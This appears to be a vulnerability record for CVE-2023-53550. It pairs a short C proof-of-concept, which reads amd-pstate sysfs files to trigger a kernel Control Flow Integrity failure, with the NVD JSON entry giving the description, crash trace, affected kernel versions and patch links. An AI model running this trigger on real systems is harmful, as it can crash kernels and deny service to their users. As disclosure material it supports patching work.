CVE-2023-53550

// PoC for CVE-2023-53550: Trigger CFI failure via sysfs attribute read // This PoC demonstrates how to trigger the type mismatch in amd-pstate sysfs attributes // Requires: Linux kernel with CFI enabled, AMD CPU with amd-pstate driver #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <string.h> // The amd_pstate sysfs attributes that trigger the CFI failure // These attributes were incorrectly registered as kobj_attributes // on the cpu root kobject which expects device_attributes static const char *amd_pstate_attrs[] = { "/sys/devices/system/cpu/cpufreq/amd_pstate/status", "/sys/devices/system/cpu/cpufreq/amd_pstate/highest_perf", "/sys/devices/system/cpu/cpufreq/amd_pstate/lowest_nonlinear_perf", "/sys/devices/system/cpu/cpufreq/amd_pstate/nominal_perf", "/sys/devices/system/cpu/cpufreq/amd_pstate/lowest_perf", "/sys/devices/system/cpu/cpufreq/amd_pstate/preferred_perf", "/sys/devices/system/cpu/cpufreq/amd_pstate/cache", "/sys/devices/system/cpu/cpufreq/amd_pstate/epp", "/sys/devices/system/cpu/cpufreq/amd_pstate/epp_values", NULL }; int main(int argc, char *argv[]) { char buf[256]; ssize_t ret; int fd, i; printf("CVE-2023-53550 PoC - amd-pstate sysfs CFI failure trigger\n"); printf("Attempting to read amd_pstate sysfs attributes to trigger CFI failure...\n\n"); for (i = 0; amd_pstate_attrs[i] != NULL; i++) { printf("Reading: %s\n", amd_pstate_attrs[i]); fd = open(amd_pstate_attrs[i], O_RDONLY); if (fd < 0) { printf(" [-] Cannot open attribute (may not exist on this system)\n"); continue; } // Reading the attribute triggers dev_attr_show() which calls // the incorrectly-typed show callback, triggering CFI failure ret = read(fd, buf, sizeof(buf) - 1); close(fd); if (ret > 0) { buf[ret] = '\0'; printf(" [+] Read %zd bytes: %s\n", ret, buf); printf(" [!] If CFI is enabled, this should have triggered a CFI failure\n"); } } printf("\nDone. Check dmesg for CFI failure messages:\n"); printf(" CFI failure at dev_attr_show+0x24/0x60 (target: show_status+0x0/0x70)\n"); return 0; }

{"cve": {"id": "CVE-2023-53550", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:50.260", "lastModified": "2026-04-06T13:33:04.717", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncpufreq: amd-pstate: fix global sysfs attribute type\n\nIn commit 3666062b87ec (\"cpufreq: amd-pstate: move to use bus_get_dev_root()\")\nthe \"amd_pstate\" attributes where moved from a dedicated kobject to the\ncpu root kobject.\n\nWhile the dedicated kobject expects to contain kobj_attributes the root\nkobject needs device_attributes.\n\nAs the changed arguments are not used by the callbacks it works most of\nthe time.\nHowever CFI will detect this issue:\n\n[ 4947.849350] CFI failure at dev_attr_show+0x24/0x60 (target: show_status+0x0/0x70; expected type: 0x8651b1de)\n...\n[ 4947.849409] Call Trace:\n[ 4947.849410] <TASK>\n[ 4947.849411] ? __warn+0xcf/0x1c0\n[ 4947.849414] ? dev_attr_show+0x24/0x60\n[ 4947.849415] ? report_cfi_failure+0x4e/0x60\n[ 4947.849417] ? handle_cfi_failure+0x14c/0x1d0\n[ 4947.849419] ? __cfi_show_status+0x10/0x10\n[ 4947.849420] ? handle_bug+0x4f/0x90\n[ 4947.849421] ? exc_invalid_op+0x1a/0x60\n[ 4947.849422] ? asm_exc_invalid_op+0x1a/0x20\n[ 4947.849424] ? __cfi_show_status+0x10/0x10\n[ 4947.849425] ? dev_attr_show+0x24/0x60\n[ 4947.849426] sysfs_kf_seq_show+0xa6/0x110\n[ 4947.849433] seq_read_iter+0x16c/0x4b0\n[ 4947.849436] vfs_read+0x272/0x2d0\n[ 4947.849438] ksys_read+0x72/0xe0\n[ 4947.849439] do_syscall_64+0x76/0xb0\n[ 4947.849440] ? do_user_addr_fault+0x252/0x650\n[ 4947.849442] ? exc_page_fault+0x7a/0x1b0\n[ 4947.849443] entry_SYSCALL_64_after_hwframe+0x72/0xdc"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4", "versionEndExcluding": "6.4.11", "matchCriteriaId": "5973AAD4-BEF4-4A23-9697-7061E1749BFF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:*", "matchCriteriaId": "E4A01A71-0F09-4DB2-A02F-7EFFBE27C98D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:*", "matchCriteriaId": "F5608371-157A-4318-8A2E-4104C3467EA1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:*", "matchCriteriaId": "2226A776-DF8C-49E0-A030-0A7853BB018A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc5:*:*:*:*:*:*", "matchCriteriaId": "6F15C659-DF06-455A-9765-0E6DE920F29A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/5e720f8c8c9d959283c3908bbf32a91a01a86547", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ddcfc33a20380508f7fea18e1c330abe17ed4fc0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}